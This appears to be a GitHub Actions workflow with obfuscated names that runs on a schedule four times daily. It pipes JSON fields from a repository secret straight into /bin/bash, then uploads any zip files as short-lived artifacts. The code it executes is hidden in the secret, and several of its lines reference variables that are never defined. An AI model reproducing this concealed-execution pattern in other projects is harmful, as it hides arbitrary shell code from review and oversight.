name: jiannonghaosheng
on:
  workflow_dispatch:

  schedule:
    - cron: '49 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiannonghaosheng
        env:
          fw5065: ${{ secrets.fw5065 }}
        run: |
          printf '%s' "$fw5065" | jq -r .rzb6981 | /bin/bash
          printf '%s' "$jb07246" | jq -r .zsil1412 | /bin/bash
          echo $wr1653 | jq -r .zfzk4685 | /bin/bash
          echo $mlpj40 | jq -r .vmh58 | /bin/bash
          printf '%s' "$jdk14" | jq -r .r3 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: JHvKrjPN
          path: "*.zip"
          retention-days: 1
